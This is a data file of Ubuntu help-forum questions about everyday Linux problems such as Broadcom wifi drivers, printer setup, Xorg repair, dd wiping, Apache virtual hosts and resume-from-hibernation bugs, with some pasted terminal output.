518090	can i cancel dd command and rebuild partition table ?	i am attempting to fix the partition table on a 1 tb hard drive . gparted on my live disk sees the drive as being `` 2 tib '' ... it is clearly labelled as 1 tb on the outside . i started a low level reformat using dd but it is progressing at about 290 kbps . it is going to take approximately 55 days to format this drive at that rate . not exactly acceptable . can i abort this and try some other method ? the drive is connected via usb 2.0 and dd is running off of a live disk . can i abort the operation without harming the hard drive ? there is no data on the drive , i want to make it usable .
518091	restore xorg core and config files ubuntu 14.04	this question is a follow up on this one . i have recently upgraded from ubuntu 12.04 to 14.04 and xserver broke during the process . i have tried reinstalling from the command line running the following : sudo apt-get update sudo apt-get upgrade sudo apt-get -y install xserver-xorg sudo apt-get -y install x11-xserver-utils sudo apt-get install xorg openbox sudo apt-get install xserver-xorg-core sudo apt-get install xorg sudo apt-get install ubuntu-desktop none of the above fixed x. i 've also tried `` upgrading '' from a live dvd . i could not find an upgrade option , however . most options implied erasing current partitions and one a side-by-side installation with previous ones . now i 'm thinking about restoring the xorg files from the live installation on the previous ( already upgraded 14.04 ) installation . how should i approach this issue ?
518098	usb mouse not working after resume from hibernation	i am on xubuntu 14.04 , 64bit , hp 635 notebook . i enabled hibernation . it works fine , except that upon resume my usb optical mouse does not work anymore . the red light on the bottom is shining though , but no reaction of the pointer . touchpad works . anyone who maybe could help me out with is ? ( please note , i also had a problem with my network manager , but that i solved following this link https : //patrick.vande-walle.eu/software/kubuntu/ubuntu-13-10-no-network-after-resuming-from-hibernation/ ) thanks a lot .
518101	how can i use monitors plugged into my graphics card and motherboard ?	i 've decided to try out ubuntu on my desktop , but i 've ran into a problem . when i first booted into it , it only detected my small monitor plugged into my motherboard . i thought of this as a non-issue , as i know ubuntu does n't use nonfree drivers by default . so after install , and upgrade , i selected non-free drivers for my graphics card and rebooted . expectedly , my two monitors plugged into my graphics card are now working and fully functional . however , my monitor plugged into my motherboard is now disabled . i went to display settings , and it does not appear as a device . what can i do to use all of my monitors ?
518106	ssh tunneling to fritz ! box via raspberrypi	i have a fritz ! box that acts as nas , dhcp and internet gateway . the webinterface of the fritz ! box is only accessible from the lan ( i 'd like to keep it that way , although it could be changed ) . can i somehow use the ( always active ) raspberrypi behind the fritz ! box ( in my homes ' lan ) to `` tunnel '' to the webinterface from my laptop over the internet ? the raspberrypi is accessible over the internet . the fritz ! box forwards its ssh port to the raspberrypi . thanks in advance , markus
518107	how do i make qbittorent appear in the `` choosing application '' of firefox	i am facing a problem while trying to download a torrent file from the pirate bay . i have installed qbittorrent . when i try to download , instead of opening a window prompting for execution or saving the file , a window asking for choosing an application appears , and the qbittorrent application does not appear . how do i go about trying to download ? i have even tried downloading and installing other torrent download softwares compatible with ubuntu , but i am facing the same problem with them .
518108	chromium freezes after resuming from standby ( kubuntu 14.04 )	every time my laptop resumes from standby the chromium browser becomes frozen . graphically , it means that it leaves an unresponsive black square on the desktop . sometimes , but not always it would start working only after shutting it down and restarting . mostly , it would still start without a window . google chrome does not freeze that way which makes me speculate that it has to do something with the new pepper flash player . i was searching the web and found reports about freezes upon resuming from standby in other programs . the reports blamed the new linux kernel > 3.10.. i booted with kernel 3.2. and chromium indeed did not freeze . any workarounds while waiting for the fix of the kernel ?
518111	no wireless working in latest ubuntu after installation	i have dell inspiren 1564 and i have install the latest version on ubuntu today . the installation is successfully completed in 10+ mins and then i update it . now everything is working good expect wifi . i have search on the internet and did some of the solution given in the forums like backport i have follow this a-z link and when i put this command in the terminal its give me frank @ frank-inspiron-1564 : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . i have try this and get response : frank @ frank-inspiron-1564 : ~ $ sudo apt-get install firmware-b43-lpphy-installer [ sudo ] password for frank : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package firmware-b43-lpphy-installer what should i do now ; i have got this list after pressing this command : frank @ frank-inspiron-1564 : ~ $ sudo lshw [ sudo ] password for frank : pci ( sysfs ) frank-inspiron-1564 description : portable computer product : inspiron 1564 ( ) vendor : dell inc. version : a13 width : 64 bits capabilities : smbios-2.6 dmi-2.6 ldt16 vsyscall32 configuration : administrator_password=disabled boot=normal chassis=portable frontpanel_password=unknown keyboard_password=unknown power-on_password=disabled *-core description : motherboard product : 08cnc9 vendor : dell inc. physical id : 0 version : a13 serial : . .cn4864302r3387 . *-firmware description : bios vendor : dell inc. physical id : 1 version : a13 date : 03/29/2011 size : 122kib capacity : 1984kib capabilities : pci pnp upgrade shadowing escd cdboot bootselect socketedrom edd int13floppy360 int13floppy1200 int13floppy720 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot smartbattery biosbootspecification netboot *-cpu description : cpu product : intel ( r ) core ( tm ) i3 cpu m 330 @ 2.13ghz vendor : intel corp. physical id : 5 bus info : cpu @ 0 version : cpu version slot : u2e1 size : 933mhz capacity : 4096mhz width : 64 bits clock : 133mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm arat dtherm tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : cores=2 enabledcores=2 threads=4 *-cache:0 description : l1 cache physical id : 6 slot : l1 cache size : 128kib capacity : 128kib capabilities : asynchronous internal write-through data *-cache:1 description : l2 cache physical id : 7 slot : l2 cache size : 512kib capacity : 1mib capabilities : burst internal write-through unified *-cache:2 description : l3 cache physical id : 8 slot : l3 cache size : 3mib capacity : 8mib capabilities : burst internal write-back *-memory description : system memory physical id : 16 slot : system board or motherboard size : 3gib *-bank:0 description : sodimm ddr3 synchronous 1067 mhz ( 0.9 ns ) product : ebj11ue6bbs0-ae-f vendor : ami physical id : 0 serial : 142e38dd slot : dimm_a size : 1gib width : 64 bits clock : 1067mhz ( 0.9ns ) *-bank:1 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : m471b5673eh1-ch9 vendor : samsung physical id : 1 serial : 634d8d46 slot : dimm_b size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-pci:0 description : host bridge product : core processor dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 12 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 12 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:43 memory : f0000000-f03fffff memory : d0000000-dfffffff ioport:1800 ( size=8 ) *-communication description : communication controller product : 5 series/3400 series chipset heci controller vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei_me latency=0 resources : irq:42 memory : f0705800-f070580f *-usb:0 description : usb controller product : 5 series/3400 series chipset usb2 enhanced host controller vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 06 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:16 memory : f0706000-f07063ff *-multimedia description : audio device product : 5 series/3400 series chipset high definition audio vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:44 memory : f0700000-f0703fff *-pci:0 description : pci bridge product : 5 series/3400 series chipset pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport:3000 ( size=4096 ) memory : bc000000-bc1fffff ioport : bc200000 ( size=2097152 ) *-pci:1 description : pci bridge product : 5 series/3400 series chipset pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 ioport:4000 ( size=4096 ) memory : f0400000-f04fffff ioport : bc400000 ( size=2097152 ) *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:17 memory : f0400000-f0403fff *-pci:2 description : pci bridge product : 5 series/3400 series chipset pci express root port 6 vendor : intel corporation physical id : 1c.5 bus info : pci @ 0000:00:1c.5 version : 06 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 ioport:2000 ( size=4096 ) memory : bc600000-bcafffff ioport : f0800000 ( size=1048576 ) *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 02 serial : b8 : ac:6f:51 : b9 : c6 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.0.2 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:40 ioport:2000 ( size=256 ) memory : f0810000-f0810fff memory : f0800000-f080ffff memory : f0820000-f083ffff *-usb:1 description : usb controller product : 5 series/3400 series chipset usb2 enhanced host controller vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 06 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : f0706400-f07067ff *-pci:3 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : a6 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list *-isa description : isa bridge product : mobile 5 series chipset lpc interface controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 06 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-storage description : sata controller product : 5 series/3400 series chipset 4 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 06 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:41 ioport:1818 ( size=8 ) ioport:180c ( size=4 ) ioport:1810 ( size=8 ) ioport:1808 ( size=4 ) ioport:1820 ( size=32 ) memory : f0705000-f07057ff *-serial unclaimed description : smbus product : 5 series/3400 series chipset smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 06 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f0706800-f07068ff ioport:1840 ( size=32 ) *-generic description : signal processing controller product : 5 series/3400 series chipset thermal subsystem vendor : intel corporation physical id : 1f.6 bus info : pci @ 0000:00:1f.6 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi cap_list configuration : driver=intel ips latency=0 resources : irq:18 memory : f0704000-f0704fff *-pci:1 description : host bridge product : core processor quickpath architecture generic non-core registers vendor : intel corporation physical id : 101 bus info : pci @ 0000 : ff:00.0 version : 02 width : 32 bits clock : 33mhz *-pci:2 description : host bridge product : core processor quickpath architecture system address decoder vendor : intel corporation physical id : 102 bus info : pci @ 0000 : ff:00.1 version : 02 width : 32 bits clock : 33mhz *-pci:3 description : host bridge product : core processor qpi link 0 vendor : intel corporation physical id : 103 bus info : pci @ 0000 : ff:02.0 version : 02 width : 32 bits clock : 33mhz *-pci:4 description : host bridge product : core processor qpi physical 0 vendor : intel corporation physical id : 104 bus info : pci @ 0000 : ff:02.1 version : 02 width : 32 bits clock : 33mhz *-pci:5 description : host bridge product : core processor reserved vendor : intel corporation physical id : 105 bus info : pci @ 0000 : ff:02.2 version : 02 width : 32 bits clock : 33mhz *-pci:6 description : host bridge product : core processor reserved vendor : intel corporation physical id : 106 bus info : pci @ 0000 : ff:02.3 version : 02 width : 32 bits clock : 33mhz *-scsi:0 physical id : 0 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : samsung hm250hi physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 2ac1 serial : s1ykja0z215008 size : 232gib ( 250gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=000e2c9c *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 3825333c-64bf-414b-a176-a1779caf4134 size : 230gib capacity : 230gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink extents ext4 ext2 initialized configuration : created=2014-08-30 17:40:33 filesystem=ext4 lastmountpoint=/ modified=2014-08-31 00:42:37 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2014-08-31 00:42:37 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 2931mib capacity : 2931mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 2931mib capabilities : nofs *-scsi:1 physical id : 2 logical name : scsi1 capabilities : emulated *-cdrom description : dvd-ram writer product : dvd a ds8a5lh vendor : hp physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : 1h68 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-battery product : simplo vendor : simplo physical id : 1 slot : system battery bay capacity : 44000mwh configuration : voltage=11.1v *-remoteaccess unclaimed vendor : intel physical id : 2 capabilities : outbound *-power unclaimed description : to be defined by o.e.m product : to be defined by o.e.m vendor : to be defined by o.e.m physical id : 3 version : 2.50 serial : to be defined by o.e.m capacity : 32768mwh frank @ frank-inspiron-1564 : ~ $ frank @ frank-inspiron-1564 : ~ $ another command and its response : frank @ frank-inspiron-1564 : ~ $ wget http : //mirrors.kernel.org/ubuntu/pool/multiverse/l/linux-firmware-nonfree/linux-firmware-nonfree_1.14ubuntu1_all.deb -- 2014-08-31 01:51:13 -- http : //mirrors.kernel.org/ubuntu/pool/multiverse/l/linux-firmware-nonfree/linux-firmware-nonfree_1.14ubuntu1_all.deb resolving mirrors.kernel.org ( mirrors.kernel.org ) ... 149.20.4.71 , 149.20.20.135 , 2001:4f8:1:10:0:1994:3:14 , ... connecting to mirrors.kernel.org ( mirrors.kernel.org ) |149.20.4.71|:80 ... connected . http request sent , awaiting response ... 200 ok length : 3942580 ( 3.8m ) [ application/vnd.debian.binary-package ] saving to : ‘linux-firmware-nonfree_1.14ubuntu1_all.deb.1’ 100 % [ ========================================================================================================= > ] 3,942,580 119kb/s in 32s 2014-08-31 01:51:46 ( 122 kb/s ) - ‘linux-firmware-nonfree_1.14ubuntu1_all.deb.1’ saved [ 3942580/3942580 ] frank @ frank-inspiron-1564 : ~ $ sudo dpkg -i linux*.deb [ sudo ] password for frank : ( reading database ... 193442 files and directories currently installed . ) preparing to unpack linux-firmware-nonfree_1.14ubuntu1_all.deb ... unpacking linux-firmware-nonfree ( 1.14ubuntu1 ) over ( 1.14ubuntu1 ) ... setting up linux-firmware-nonfree ( 1.14ubuntu1 ) ... frank @ frank-inspiron-1564 : ~ $ another one : frank @ frank-inspiron-1564 : ~ $ dmesg | grep b43 [ 14.580479 ] b43 : disagrees about version of symbol ieee80211_get_response_rate [ 14.580484 ] b43 : unknown symbol ieee80211_get_response_rate ( err -22 ) [ 14.580605 ] b43 : disagrees about version of symbol ieee80211_free_hw [ 14.580606 ] b43 : unknown symbol ieee80211_free_hw ( err -22 ) [ 14.580619 ] b43 : disagrees about version of symbol ieee80211_alloc_hw [ 14.580621 ] b43 : unknown symbol ieee80211_alloc_hw ( err -22 ) [ 14.580633 ] b43 : disagrees about version of symbol ieee80211_register_hw [ 14.580635 ] b43 : unknown symbol ieee80211_register_hw ( err -22 ) [ 14.580646 ] b43 : disagrees about version of symbol __ieee80211_get_radio_led_name [ 14.580648 ] b43 : unknown symbol __ieee80211_get_radio_led_name ( err -22 ) [ 14.580652 ] b43 : disagrees about version of symbol ieee80211_generic_frame_duration [ 14.580653 ] b43 : unknown symbol ieee80211_generic_frame_duration ( err -22 ) [ 14.580657 ] b43 : disagrees about version of symbol ieee80211_wake_queue [ 14.580658 ] b43 : unknown symbol ieee80211_wake_queue ( err -22 ) [ 14.580681 ] b43 : disagrees about version of symbol __ieee80211_get_tx_led_name [ 14.580682 ] b43 : unknown symbol __ieee80211_get_tx_led_name ( err -22 ) [ 14.580698 ] b43 : disagrees about version of symbol wiphy_rfkill_set_hw_state [ 14.580700 ] b43 : unknown symbol wiphy_rfkill_set_hw_state ( err -22 ) [ 14.580731 ] b43 : disagrees about version of symbol __ieee80211_get_rx_led_name [ 14.580732 ] b43 : unknown symbol __ieee80211_get_rx_led_name ( err -22 ) [ 14.580751 ] b43 : disagrees about version of symbol ieee80211_queue_delayed_work [ 14.580752 ] b43 : unknown symbol ieee80211_queue_delayed_work ( err -22 ) [ 14.580760 ] b43 : disagrees about version of symbol ieee80211_ctstoself_get [ 14.580761 ] b43 : unknown symbol ieee80211_ctstoself_get ( err -22 ) [ 14.580782 ] b43 : disagrees about version of symbol ieee80211_rx [ 14.580784 ] b43 : unknown symbol ieee80211_rx ( err -22 ) [ 14.580802 ] b43 : disagrees about version of symbol ieee80211_wake_queues [ 14.580804 ] b43 : unknown symbol ieee80211_wake_queues ( err -22 ) [ 14.580809 ] b43 : disagrees about version of symbol ieee80211_free_txskb [ 14.580810 ] b43 : unknown symbol ieee80211_free_txskb ( err -22 ) [ 14.580846 ] b43 : disagrees about version of symbol ieee80211_tx_status [ 14.580847 ] b43 : unknown symbol ieee80211_tx_status ( err -22 ) [ 14.580851 ] b43 : disagrees about version of symbol ieee80211_stop_queue [ 14.580852 ] b43 : unknown symbol ieee80211_stop_queue ( err -22 ) [ 14.580877 ] b43 : disagrees about version of symbol __ieee80211_get_assoc_led_name [ 14.580879 ] b43 : unknown symbol __ieee80211_get_assoc_led_name ( err -22 ) [ 14.580882 ] b43 : disagrees about version of symbol wiphy_rfkill_start_polling [ 14.580884 ] b43 : unknown symbol wiphy_rfkill_start_polling ( err -22 ) [ 14.580906 ] b43 : disagrees about version of symbol ieee80211_unregister_hw [ 14.580907 ] b43 : unknown symbol ieee80211_unregister_hw ( err -22 ) [ 14.580913 ] b43 : disagrees about version of symbol ieee80211_beacon_get_tim [ 14.580914 ] b43 : unknown symbol ieee80211_beacon_get_tim ( err -22 ) [ 14.580931 ] b43 : disagrees about version of symbol ieee80211_rts_get [ 14.580932 ] b43 : unknown symbol ieee80211_rts_get ( err -22 ) [ 14.580939 ] b43 : disagrees about version of symbol ieee80211_queue_work [ 14.580940 ] b43 : unknown symbol ieee80211_queue_work ( err -22 ) frank @ frank-inspiron-1564 : ~ $ rfkill list un-installation of backports and the follow the chili 's instruction and i get this response : frank @ frank-inspiron-1564 : ~ $ dmesg | grep b43 [ 14.408606 ] b43-phy0 : broadcom 4312 wlan found ( core revision 15 ) [ 14.451738 ] b43-phy0 : found phy : analog 6 , type 5 ( lp ) , revision 1 [ 21.432960 ] b43-phy0 : loading firmware version 666.2 ( 2011-02-23 01:15:07 ) frank @ frank-inspiron-1564 : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off
518115	chrome/chromium fonts look bad starting from version 37	after an upgrade from version 36 to 37 , the fonts in google chrome browser and its opensource variation chromium look much worse . in the attached screenshot you will the same page viewed with version 37 ( left ) and 36 ( right ) . the fonts on the left are visible fatter and fuzzier than in chromium . any way to fix it ? update : i googled and found that starting with version 37 google chrome comes with a feature directwrite with is meant to improve font rendering for windows users . it seems the font looks in linux is also affected by this . however , on linux there seems to be no way to disable this feature using chrome : //flags . for now , i downgraded my browsers to a version prior to 37 .
518117	wine apps in fullscreen	i am having a problem when running old games through wine the problem is that most old games have a maximum resolution that is much smaller than mine ( 1366x768 ) and instead of being stretched to cover the full screen it only covers the top-left part of it . for example when i run starcraft it will cover exactly 800x600 starting from the top-left of the screen , and the rest is all black . i have this problem with modern games as well but for those i can set the resolution to exactly what i need and the problem is solved also , i tried running the game 'fate ' on lubuntu x86 on another computer and it worked correctly on all availabile resolutions ... it seems this only occurs for ubuntu x64 , maybe because of unity or something ? my os is ubuntu 14.04 x64 i use the latest proprietary nvidia drivers edit : i am also having another problem that may or may not be related . sometimes when exiting games that are not on the native resolution , all opened windowses , and even the context menu , get a big black border around them that wo n't dissapear unless i log off and back on , or reboot , or simply just restarting unity through the terminal . this border will appear when i open oher things too
518121	unabled to use gnucash with mysql	i use gnucash on windows , and this got the possibility to use mysql . can i use gnucash on ubuntu with mysql connection , because i do n't have that option now on ubuntu . and i like ubuntu very much i use ubuntu 14.04 and gnucash 1:2.6.1-2
518123	vendor id and product id for micromax 355g usb modem	i recently switched from windows to ubuntu and i 'm newbie to this new platform . i want to configure my micromax 355g usb modem in ubuntu 14.04 and for configure i check out lot of question on this form and follow step . when i inserted my usb device and open terminal and type lsusb then it shows `` krish @ krish-inspiron-5521 : ~ $ lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0bda:58c2 realtek semiconductor corp . bus 001 device 004 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 003 : id 8087:07da intel corp . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 006 : id 1dbc:0669 bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub krish @ krish-inspiron-5521 : ~ $ and now i 'm not sure which is my vendor id or product id for usb modem . so please anyone tell which is my vendor and product id and if u can explain further process of configuring usb modem then i really thankful to u ...
518124	mouse problems on 14.04	i am new to ubuntu just installed ubuntu 32 bit ( dual boot with windows 7 32 bit ) and found that my touchpad is not working and there is no cursor is displayed on the screen , it comes only when rebooting or shutting down that to for a few seconds and disappears again at this time also it does n't moves . my laptop is a lenovo 3000 y500 series with 1gb ram and an intel pentium dual core inside processor 1.7ghz
518125	replacing win xp and nothing happened	i need help fast i have an old computer that was made around the year 2000 and it is a dell i got the 32 bit version and burned it to a dvd-r disc i tried to make sure it was in iso format or something like that then i stuck it in my dvd drive and restarted my computer the computer will boot up and then before the windows splash screen shows , the screen goes black except for a little white underscore in the top left corner then windows boots and nothing happens please i need your help asap . thank you
518127	printer driver error message	i 'm trying to install a driver for a canon mx882 printer . according to the canon europe website instructions , two driver files are required : cnijfilter-common_3.50-1_i386.deb and cnijfilter-mx880series_3.50-1_i386.deb . cnijfilter-common_3.50-1_i386.deb installs properly with the ubuntu software center . attempting to install the second file produces the error message : dependency not satisfied . no dependency is named with the error message . how can i determine which file is required and where it can be found ? a shell script is included with the package . maybe this is the dependency . if so , i do n't know how to utilize it . apparently no one wants to help with this vital question , so i am giving up and will now uninstall xubuntu . goodbye .
518129	script to list passwords for wifi connections	i am writing a script that finds various pieces of information about the ethernet interfaces . i have got most using ifconfig and iwconfig . however i now need to extract the passwords . the passwords seem to be located in files that are named after the ssid in files like this : /etc/networkmanager/system-connections/ < myssid > however i imagine you can not rely on the file name always being exactly equal to the ssid ( correct me if i 'm wrong ) . is there an alternative ? i.e . a command or something that will extract the password given wlan0 etc . ubuntu 12.04
518131	vim not found after installing ubuntu 10.10	i installed ubuntu and tried to use vim and it says not found . i also tried to install vim with sudo apt-get install vim and is says it is not found again . i took a linux course based in using vim and i like it , i want to use it . how do i get it to work or install it .
518132	desktop shortcut does n't work for script but script work fine	# ! /bin/bash/ ls -1 *.mp3 > playlist.m3u for ( ( ; ; ) ) do mplayer -playlist playlist.m3u ; sleep 0.1 ; done this is the script and it works ! [ desktop entry ] version=1.0 type=application name=play comment=play music exec=bash /home/awesome/desktop/test/play.sh icon= terminal=true genericname=player
518134	installation of a canon mf8380cdw on ubuntu 14.04lts	i am trying to install a canon color imageclass mf8380cdw in a 64-bit installation of ubuntu 14.04 . i was able to download the linux drivers here : http : //www.usa.canon.com/cusa/support/consumer/printers_multifunction/imageclass_series/color_imageclass_mf8380cdw # driversandsoftware , but after running the .deb files and installing the printer through system settings > printers ( just using the add wizard ) , the printer shows up in the printers pane , but printing to it fails with no error messages . the printer has worked on this computer in the past , but had to be re-installed after a recent clean install of ubuntu . i am not sure how to proceed from here , since i get no error messages either on the computer or on the printer . any help would be appreciated . thanks . i read this similar posting , but since canon provided linux drivers , i just used them as-is - so i do n't think it is relevant to my situation : installing canon color imageclass mf8380cdw drivers in ubuntu 12.10
518138	how to setup wifi	the only os i have used has been windows but i wanted to try lubuntu on a netbook . i 'm booting from a flash drive to try it out first . how do i connect the wifi . remember i 'm new to this so i not sure how the os even works completely aka sudo command .
518141	ubuntu 14.04.1 - unity tweak tool not working ?	i 've been trying to use unity tweak tool to apply the numix icon and gtk themes , but it wo n't work at all . the only thing i 've even done in ubuntu after installing it is just using compiz to make the top bar transparent . would this cause it ?
518142	printer nightmare !	i need help with setting up a wireless printer . it is a canon mg3522 and it seems impossible to set up . please i need help ! this is the printer i have .
518143	reset network @ ubuntu 14.04	hi i 've been trying to setup mobile hotspot in my laptop ( ubuntu14.04 ) so i go ahead with `` how to setup an access point mode wi-fi hotspot ? '' after changing the files listed in the file i 'm unable to connect to any wifi all the saved connections had been lost . if i connect internet via cable the connection is lost after a couple of minutes to make it live i need to plug and unplug it . is there any way to reset all the networking settings ?
518147	minimized windows	how do i find ( or have them displayed at the top or bottom of the screen ) windows that i have minimized ? my daughter did something to my computer and when i minimize a window it disappears .
518148	what are folders and how do they work ?	in ubuntu and ext4 , how do folders work exactly ? are they solely virtual and take up no disc space ? do they actually take up space ? can i fill up my 1tb backup drive with nothing but folders ? ( slightly unrelated , but ... ) is it possible to delete a folder but keep the files existing ? basically `` orphan '' the files ? [ i do not mean mving the files , i mean deleting only the folder the files are in , but not the files . in general , how do inodes even work ?
518150	mic volume settings	i 'm a gamer . i 'm using ubuntu 12.04 with unity 2d and i have a microphone set up , but when i log out and back in , the mic volume level has changed to 0 . it 's a pain to have to reset the volume every time i log in , so is there a workaround or command i can run on startup to set it ?
518151	ubuntu server 14.04.1 lts wo n't boot w/monitor connected	i installed ubuntu server 14.04.1 lts on a lenovo rd540 server . actually two of them . both servers experience same behavior . 1 ) server stalls during bootup . 2 ) the most recent message during boot is `` mei 0000:00:16.0 : initialization failed '' . 3 ) bootup stalls only if monitor is connected . if i disconnect the vga cable and boot , then connect monitor after i 've given it time to boot up , i 'm at the login prompt and there is no issue . if i leave monitor connected it always stalls during boot . i tried blacklisting mei thinking it was the problem given the error message that always shows when it stalls . i followed the instructions here : http : //www.thomas-krenn.com/en/wiki/resolve_mei : _init_hw_failure_or_mei : _initialization_failed note the instructions did n't work correctly . i actually had to do the command `` blacklist mei_me '' to get mei to blacklist . `` blacklist mei '' did n't do anything . after blacklisting mei the problem still exists , the only difference is that the error message ( # 2 ) is gone . but instead the boot still stalls , but there is no discernable error causing the stall . my current theory is that this issue has nothing to do with mei and is maybe graphics related ? but i 'm really perplexed . it 's a server , terminal only . not loading a window manager . only stalls on boot if monitor is connected . any ideas ?
518153	tap to click - short mouse movements registering as a click	i 'm on ubuntu 14.04 , on a lenovo y410p ideapad , and i 'm having an issue where my mouse movements are registering as a tap even when i 've actually moved my cursor . for instance , maybe i have the cursor 100 pixels away from something and i move the cursor quickly to the target . when i lift my finger , ubuntu thinks i 've clicked . i 'm guessing there 's a time thresh hold for how long the touchpad can be engaged , and if the movement is less than that amount of time it registers as a click ? if so , i 'd like to shorten this thresh hold . but maybe it does n't work like that ? it 's really annoying , since any small movement of the mouse usually results in a click , often closing tabs or windows unintentionally .
518165	kubuntu audio duplex input problem	kubuntu 14.04 kernel 3.1.3.0-32-generic hello , my problem here is my sound input suddenly stopped working properly . one day i decided to use my laptop when i found out that my applications audio was using my input as well as my output , and my microphone was not being registered . for example : if i go into a skype call , and play music in the background , skype can hear my music but not my voice . i already tried using pavucontrol and alsamixer to no avail . thanks for the help in advance : )
518170	virtualhosts not working properly	i am running ubuntu gnome 14.04 , i apt-get installed apache2 , php and mysql . from there , localhost was working fine , running from the /var/www/html/ directory . i created a new file , /etc/apache2/sites-available/laravel.example.conf , and mimicked the 000-default.conf file that already existed in that folder : < virtualhost *:80 > servername laravel.example serveralias www.laravel.example serveradmin tomjhash @ gmail.com documentroot /var/www/sites/laravel.example errorlog $ { apache_log_dir } /laravel.example_error.log customlog $ { apache_log_dir } /laravel.example_access.log combined < /virtualhost > # vim : syntax=apache ts=4 sw=4 sts=4 sr noet i created the folder at /var/www/sites/laravel.example , added in 127.0.0.1 laravel.example to /etc/hosts , ran a2ensite laravel.example.conf , restarted apache , but still just get web page not available when i try load it . any ideas ?
